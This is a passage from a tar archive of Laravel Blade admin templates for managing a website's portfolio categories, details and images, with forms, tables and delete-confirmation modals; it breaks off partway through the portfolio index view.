����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/category/edit.blade.php�������������������������������������������������������0000644�����������������00000006446�14765366573�0015367 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_category') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-category.update', $category->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" value="{{ $category->category_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $category->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $category->status == 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $category->status == 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/detail/create.blade.php�������������������������������������������������������0000644�����������������00000041160�14765366573�0015322 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.portfolio_details') }}</h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#portfolioDetailSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#portfolioDetailModal">+ {{ __('content.add_portfolio_detail') }}</button> </div> </div> @if (count($portfolio_details) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('portfolio-detail.destroy_checked', $id) }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($portfolio_details); $asc=0; @endphp @foreach ($portfolio_details as $portfolio_detail) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $portfolio_detail->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $portfolio_detail->title }}</td> <td>{{ $portfolio_detail->order }}</td> <td> <div> <a href="{{ url('admin/portfolio-detail/'. $id.'/'.$portfolio_detail->id. '/edit') }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $portfolio_detail->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $portfolio_detail->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('portfolio-detail.destroy', $portfolio_detail->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="portfolioDetailSectionModal" tabindex="-1" role="dialog" aria-labelledby="portfolioDetailSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="portfolioDetailSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($portfolio_detail_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-detail-section.update', $portfolio_detail_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $portfolio_detail_section->title }}"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#portfolioDetailSectionDestroyModal{{ $portfolio_detail_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="portfolioDetailSectionDestroyModal{{ $portfolio_detail_section->id }}" tabindex="-1" role="dialog" aria-labelledby="portfolioDetailSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="portfolioDetailSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('portfolio-detail-section.destroy', $portfolio_detail_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-detail-section.store') }}" method="POST"> @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <div class="modal fade" id="portfolioDetailModal" tabindex="-1" role="dialog" aria-labelledby="portfolioDetailModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="portfolioDetailModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-detail.store', $id) }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/detail/edit.blade.php���������������������������������������������������������0000644�����������������00000005251�14765366573�0015005 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_portfolio_detail') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-detail.update', $portfolio_detail->id) }}" method="POST"> @method('PUT') @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $portfolio_id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $portfolio_detail->title }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <input type="text" name="description" class="form-control" id="description" value="{{ $portfolio_detail->description }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $portfolio_detail->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/image/create.blade.php��������������������������������������������������������0000644�����������������00000025770�14765366573�0015153 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.portfolio_images') }}</h6> <div> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#portfolioImageModal">+ {{ __('content.add_portfolio_image') }}</button> </div> </div> @if (count($portfolio_images) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('portfolio-image.destroy_checked', $id) }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.image') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($portfolio_images); $asc=0; @endphp @foreach ($portfolio_images as $portfolio_image) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $portfolio_image->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> @if (!empty($portfolio_image->section_image)) <img class="image-size img-fluid" src="{{ asset('uploads/img/portfolio/image/'.$portfolio_image->section_image) }}" alt="image"> @else <img class="image-size img-fluid" src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image"> @endif </td> <td>{{ $portfolio_image->order }}</td> <td> <div> <a href="{{ url('admin/portfolio-image/'. $id.'/'.$portfolio_image->id. '/edit') }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $portfolio_image->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $portfolio_image->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('portfolio-image.destroy', $portfolio_image->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="portfolioImageModal" tabindex="-1" role="dialog" aria-labelledby="portfolioImageModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="portfolioImageModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-image.store', $id) }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 800 x 600)(.svg, .png, .jpg, .jpeg, .webp, .gif)</label> <input id="section_image" name="section_image" type="file" class="form-control-file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ��������views/admin/portfolio/image/edit.blade.php����������������������������������������������������������0000644�����������������00000010306�14765366573�0014622 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_portfolio_image') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-image.update', $portfolio_image->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="portfolio_id" type="hidden" value="{{ $portfolio_id }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 410 x 410) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($portfolio_image->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/portfolio/image/'.$portfolio_image->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $portfolio_image->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/portfolio/index.blade.php���������������������������������������������������������������0000644�����������������00000064405�14765366573�0013733 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title mb-0">{{ __('content.portfolio') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('portfolio.index', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/portfolio-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#portfolioSectionModal">{{ __('content.section_title_and_description') }}</button> <a href="{{ url('admin/portfolio/create/'.$style) }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_portfolio') }}</a> </div> </div> @if (count($portfolios) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('portfolio.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.additional_features') }}</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($portfolios); $asc=0; @endphp @foreach ($portfolios as $portfolio) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $portfolio->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td> <div class="btn-group"> <button type="button" class="btn btn-primary dropdown-toggle" data-toggle="dropdown" aria-expanded="false">{{ __('content.select') }}</button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('portfolio-content.create', $portfolio->id) }}">{{ __('content.portfolio_content') }}</a> <a class="dropdown-item" href="{{ route('portfolio-detail.create', $portfolio->id) }}">{{ __('content.portfolio_details') }}</a> <a class="dropdown-item" href="{{ route('portfolio-image.create', $portfolio->id) }}">{{ __('content.portfolio_images') }}</a> </div> </div> </td> <td>{{ $portfolio->title }}</td> <td>{{ $portfolio->category_name }}</td> <td>{{ $portfolio->order }}</td> <td> <div> <a href="{{ route('portfolio.edit', $portfolio->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $portfolio->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $portfolio->id }}" tabindex="-1" role="dialog" aria-labelledby="counterModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('portfolio.destroy', $portfolio->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="portfolioSectionModal" tabindex="-1" role="dialog" aria-labelledby="portfolioSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="portfolioSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($portfolio_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-section.update', $portfolio_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $portfolio_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $portfolio_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</span> </small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $portfolio_section->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $portfolio_section->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="{{ $portfolio_section->section_item }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="{{ $portfolio_section->paginate_item }}"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#portfolioSectionDestroyModal{{ $portfolio_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="portfolioSectionDestroyModal{{ $portfolio_section->id }}" tabindex="-1" role="dialog" aria-labelledby="portfolioSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="portfolioSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('portfolio-section.destroy', $portfolio_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('portfolio-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div 